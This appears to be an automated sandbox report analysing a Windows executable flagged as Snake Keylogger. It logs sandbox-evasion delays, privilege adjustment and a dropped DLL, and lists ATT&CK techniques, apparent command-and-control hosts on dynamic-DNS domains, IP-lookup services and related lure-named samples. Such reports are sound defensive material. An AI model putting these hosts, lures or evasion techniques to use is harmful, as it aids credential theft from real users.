        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeMemory allocated: 34730000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeMemory allocated: 36730000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 599703Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 598765Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 598640Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 598531Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 598421Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 598312Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 598203Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 598093Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597984Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597875Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597758Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597656Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597547Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597437Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597328Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597218Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597109Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597000Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 596890Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 596781Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 596672Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 596547Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 596437Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeWindow / User API: threadDelayed 1066Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeWindow / User API: threadDelayed 3399Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszB838.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -10145709240540247s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 7372Thread sleep count: 1066 > 30Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -599703s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -598765s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -598640s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -598531s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -598421s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -598312s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 7372Thread sleep count: 3399 > 30Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -598203s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -598093s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -597984s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -597875s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -597758s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -597656s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -597547s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -597437s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -597328s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -597218s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -597109s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -597000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -596890s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -596781s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -596672s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -596547s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe TID: 1424Thread sleep time: -596437s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_00402868 FindFirstFileW,6_2_00402868
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_004065C7 FindFirstFileW,FindClose,6_2_004065C7
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_00405996
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 599703Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 598765Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 598640Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 598531Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 598421Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 598312Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 598203Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 598093Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597984Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597875Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597758Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597656Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597547Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597437Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597328Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597218Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597109Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 597000Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 596890Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 596781Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 596672Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 596547Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeThread delayed: delay time: 596437Jump to behavior
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2563934124.0000000004255000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2563934124.00000000041F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Swift Copy_19.02.2025.exe, 00000006.00000002.2563934124.0000000004255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0U
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeAPI call chain: ExitProcess graph end nodegraph_0-4888
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeAPI call chain: ExitProcess graph end nodegraph_0-4883
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_00401E49 LdrInitializeThunk,ShowWindow,EnableWindow,0_2_00401E49
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_703D1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_703D1B5F
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess created: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe "C:\Users\user\Desktop\Swift Copy_19.02.2025.exe"Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeQueries volume information: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000006.00000002.2583953179.0000000034731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000006.00000002.2583953179.0000000034731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        1
        Masquerading
        OS Credential Dumping21
        Security Software Discovery
        Remote Services1
        Archive Collected Data
        11
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
        Process Injection
        1
        Disable or Modify Tools
        LSASS Memory31
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Clipboard Data
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading
        31
        Virtualization/Sandbox Evasion
        Security Account Manager1
        Application Window Discovery
        SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Access Token Manipulation
        NTDS1
        System Network Configuration Discovery
        Distributed Component Object ModelInput Capture13
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Process Injection
        LSA Secrets2
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Deobfuscate/Decode Files or Information
        Cached Domain Credentials214
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
        Obfuscated Files or Information
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        Swift Copy_19.02.2025.exe45%ReversingLabsWin32.Spyware.Snakekeylogger
        Swift Copy_19.02.2025.exe53%VirustotalBrowse
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nszB838.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nszB838.tmp\System.dll0%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        drive.google.com
        172.217.16.206
        truefalse
          high
          drive.usercontent.google.com
          142.250.185.193
          truefalse
            high
            reallyfreegeoip.org
            104.21.64.1
            truefalse
              high
              checkip.dyndns.com
              132.226.247.73
              truefalse
                high
                checkip.dyndns.org
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  http://checkip.dyndns.org/false
                    high
                    https://reallyfreegeoip.org/xml/8.46.123.189false
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://aborters.duckdns.org:8081Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.0000000034731000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://www.google.comSwift Copy_19.02.2025.exe, 00000006.00000003.2455210144.000000000426D000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000003.2455142755.000000000426D000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://drive.google.com/Swift Copy_19.02.2025.exe, 00000006.00000002.2563934124.00000000041F8000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://anotherarmy.dns.army:8081Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.0000000034731000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://drive.usercontent.google.com/bSwift Copy_19.02.2025.exe, 00000006.00000002.2563934124.0000000004255000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000003.2489623371.0000000004265000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://reallyfreegeoip.org/xml/8.46.123.189utSwift Copy_19.02.2025.exe, 00000006.00000002.2563934124.00000000042BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://reallyfreegeoip.org/xml/8.46.123.189$Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003482D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003487D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://reallyfreegeoip.orgSwift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003487D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.0000000034808000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://drive.google.com//Swift Copy_19.02.2025.exe, 00000006.00000002.2563934124.00000000041F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://reallyfreegeoip.orgSwift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003482D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003487D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.00000000347EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://drive.usercontent.google.com/Swift Copy_19.02.2025.exe, 00000006.00000002.2563934124.0000000004255000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000003.2489623371.0000000004265000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://checkip.dyndns.orgSwift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003482D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003487D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.00000000347DE000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.00000000347EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://apis.google.comSwift Copy_19.02.2025.exe, 00000006.00000003.2455210144.000000000426D000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000003.2455142755.000000000426D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://checkip.dyndns.comSwift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.000000003487D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.00000000347EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://nsis.sf.net/NSIS_ErrorErrorSwift Copy_19.02.2025.exefalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSwift Copy_19.02.2025.exe, 00000006.00000002.2583953179.0000000034731000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://varders.kozow.com:8081Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.0000000034731000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://reallyfreegeoip.org/xml/Swift Copy_19.02.2025.exe, 00000006.00000002.2583953179.00000000347EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          142.250.185.193
                                                          drive.usercontent.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          172.217.16.206
                                                          drive.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          104.21.64.1
                                                          reallyfreegeoip.orgUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          132.226.247.73
                                                          checkip.dyndns.comUnited States
                                                          16989UTMEMUSfalse
                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1620702
                                                          Start date and time:2025-02-21 08:19:25 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 6m 35s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:9
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Swift Copy_19.02.2025.exe
                                                          Detection:MAL
                                                          Classification:mal88.troj.evad.winEXE@3/14@4/4
                                                          EGA Information:
                                                          • Successful, ratio: 50%
                                                          HCA Information:
                                                          • Successful, ratio: 92%
                                                          • Number of executed functions: 83
                                                          • Number of non-executed functions: 74
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.60, 52.149.20.212
                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target Swift Copy_19.02.2025.exe, PID 720 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          TimeTypeDescription
                                                          03:43:02API Interceptor24x Sleep call for process: Swift Copy_19.02.2025.exe modified
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          104.21.64.1Request for quotation -6001845515-XLSX.exeGet hashmaliciousLokibotBrowse
                                                          • touxzw.ir/tking3/five/fre.php
                                                          vsf098633534.exeGet hashmaliciousLokibotBrowse
                                                          • touxzw.ir/sccc/five/fre.php
                                                          laser.ps1Get hashmaliciousFormBookBrowse
                                                          • www.lucynoel6465.shop/jgkl/
                                                          UPDATED SOA.pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.shlomi.app/t3l4/
                                                          QUOTE OF DRY DOCK REPAIR.exeGet hashmaliciousFormBookBrowse
                                                          • www.arryongro-nambe.live/ljgq/
                                                          QUOTATION NO REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                                                          • www.askvtwv8.top/2875/
                                                          Revised Order Confirmation.exeGet hashmaliciousFormBookBrowse
                                                          • www.lucynoel6465.shop/hbfq/
                                                          UPIlkrNpsh.exeGet hashmaliciousUnknownBrowse
                                                          • xerecao.cc/
                                                          engine.ps1Get hashmaliciousFormBookBrowse
                                                          • www.askvtwv8.top/b8fe/
                                                          laserrrrrrrr.ps1Get hashmaliciousFormBookBrowse
                                                          • www.lucynoel6465.shop/jgkl/
                                                          132.226.247.73INV76280.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                          • checkip.dyndns.org/
                                                          rAntephialtic.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          invoice for payment request.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          Bank Slip pdf (2).exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                          • checkip.dyndns.org/
                                                          Quotation.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          Request For Quote.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                          • checkip.dyndns.org/
                                                          RECEIPT ATTACHMENT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          Bibliofils.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          Researches.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          reallyfreegeoip.org[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.96.1
                                                          INV76280.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                          • 104.21.96.1
                                                          rAntephialtic.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 104.21.32.1
                                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 104.21.16.1
                                                          rfacturapendiente.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 104.21.32.1
                                                          invoice for payment request.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.32.1
                                                          New PO 127429.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.48.1
                                                          BugSplat64.dll.dllGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                          • 104.21.80.1
                                                          60069-PO-13228.pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                          • 104.21.16.1
                                                          RFQ-INQUIRY#46883-A24.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.16.1
                                                          checkip.dyndns.com[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 193.122.6.168
                                                          INV76280.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                          • 132.226.247.73
                                                          rAntephialtic.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 132.226.247.73
                                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 132.226.247.73
